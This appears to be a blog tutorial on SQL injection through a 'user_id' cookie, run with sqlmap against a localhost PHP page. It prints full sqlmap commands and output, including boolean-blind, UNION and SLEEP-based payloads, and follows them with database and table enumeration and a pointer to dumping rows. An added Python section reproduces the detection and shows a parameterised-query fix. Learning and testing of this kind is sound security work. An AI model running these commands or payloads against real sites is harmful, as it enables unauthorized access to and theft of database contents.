MySQL Injection through Cookies

This has been out there for a while now, but I still thought I'd write a simple tutorial on SQL injection through cookies.

What are Cookies ?

A cookie is a small piece of data a web server hands to a browser. The browser stores it and sends it back with every subsequent request to that server. For example, cookies are most often used to keep a user logged in, so he does not have to log in again every time he refreshes the page. Because the browser sends the value back verbatim, anything stored in a cookie is client-controlled input: an attacker can edit it freely, and the server has to validate it exactly like a GET or POST parameter.

Our target's current cookie value is the following:

PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1

SQL Injection With sqlmap

For this example I used sqlmap, a very capable automatic SQL injection tool. The vulnerable cookie parameter is "user_id".

Identifying the Vulnerability

By default sqlmap only tests GET and POST parameters. --level 2 brings Cookie header values into scope, and --level 3 adds the User-Agent and Referer headers as well, which is why --level 3 is passed below.

root@core-VPCCW16FB:# ./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --level 3 --dbms=MYSQL

    sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

....
[11:30:45] [INFO] heuristic test shows that Cookie parameter 'user_id' might be injectable (possible DBMS: MySQL)
[11:30:45] [INFO] testing sql injection on Cookie parameter 'user_id'
[11:30:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:30:45] [INFO] Cookie parameter 'user_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:30:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:30:46] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:30:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:30:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:30:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[11:30:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:30:56] [INFO] target url appears to have 3 columns in query
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: Cookie
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND 8697=8697

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)
---

[11:30:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
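
To make the output above concrete, here is an added example (not code from the original post) of what index.php is presumably doing wrong, and how to fix it. It is a small Python stand-in for the vulnerable page, backed by an in-memory SQLite database so it runs offline: the table and column names (users: id, name, email) are assumed, since the post only reveals a database and a table both named 'test'. It reproduces sqlmap's boolean-based blind check from the log above, shows it failing against a parameterised version of the same lookup, and decodes the hex markers in the UNION payload sqlmap reported.

```python
"""Added example, not code from the original post: a SQLite-backed stand-in
for the vulnerable index.php, sqlmap's boolean-based detection logic, and
the parameterised fix.  Table/column names (users: id, name, email) are
assumed; the post only reveals a database and a table both named 'test'."""
import re
import sqlite3

SESSION_ID = "b53vsia3006i1oe0ucmp8t2j20"  # PHPSESSID from the post's cookie

# UNION payload exactly as sqlmap reported it in the post's output
UNION_PAYLOAD = ("1 LIMIT 1,1 UNION ALL SELECT NULL, "
                 "CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#")


def make_db():
    """Constructed sample data with the 3 columns sqlmap counted."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "alice@example.com"),
                      (2, "bob", "bob@example.com")])
    return conn


def parse_cookie_header(header):
    """Split 'a=1; b=2' into a dict, roughly how PHP fills $_COOKIE."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def cookie_header(user_id_value):
    """Build the Cookie header in the same shape sqlmap sent it."""
    return f"PHPSESSID={SESSION_ID}; user_id={user_id_value}"


def vulnerable_lookup(conn, header):
    """The bug: the cookie value is concatenated straight into the SQL."""
    user_id = parse_cookie_header(header).get("user_id", "")
    sql = f"SELECT id, name, email FROM users WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, header):
    """The fix: check the expected type, then bind the value as a parameter."""
    user_id = parse_cookie_header(header).get("user_id", "")
    if not user_id.isdigit():  # an id is an integer; reject everything else
        return []
    sql = "SELECT id, name, email FROM users WHERE id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def boolean_blind_oracle(lookup, conn, base="1"):
    """sqlmap's 'AND boolean-based blind' test, as in the post's output:
    a true condition (8697=8697) must leave the page unchanged and a false
    one (8697=8698) must change it.  Works with any lookup function."""
    plain = lookup(conn, cookie_header(base))
    true_case = lookup(conn, cookie_header(f"{base} AND 8697=8697"))
    false_case = lookup(conn, cookie_header(f"{base} AND 8697=8698"))
    return plain == true_case and true_case != false_case


def decode_union_markers(payload):
    """sqlmap's UNION payload: LIMIT 1,1 hides the real row, then a random
    string wrapped in two hex-encoded markers is selected into the visible
    column so sqlmap can find its output in the page.  Decode the markers."""
    return [bytes.fromhex(h).decode() for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable injectable:", boolean_blind_oracle(vulnerable_lookup, db))
    print("fixed injectable:     ", boolean_blind_oracle(safe_lookup, db))
    print("UNION markers:", decode_union_markers(UNION_PAYLOAD))
```

SQLite stands in for MySQL here, so the SLEEP(5) and `#`-comment payloads from the log cannot be replayed against it; the boolean differential is the first test sqlmap ran above, and it is enough to tell the concatenated query from the bound one. The three decoded markers are ':gmz:', a random string, and ':irc:', which is what sqlmap greps the response for when it confirms the 3-column UNION.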

Current Database

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --current-db

...
current database:    'test'

Table List

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --tables -D'test'
...
Database: test
[1 table]
+------+
| test |
+------+

From here on it proceeds like any other SQL injection: enumerate the columns of the table with --columns, dump the rows with --dump, and so on.

Cya ..


2 Responses to “MySQL Injection through Cookies”

  1. b!tc0unt Says:

    It's not only cookies: User-Agent, Referer... it actually depends. Anyway, nice article.

  2. Thanks! Very Interesting!
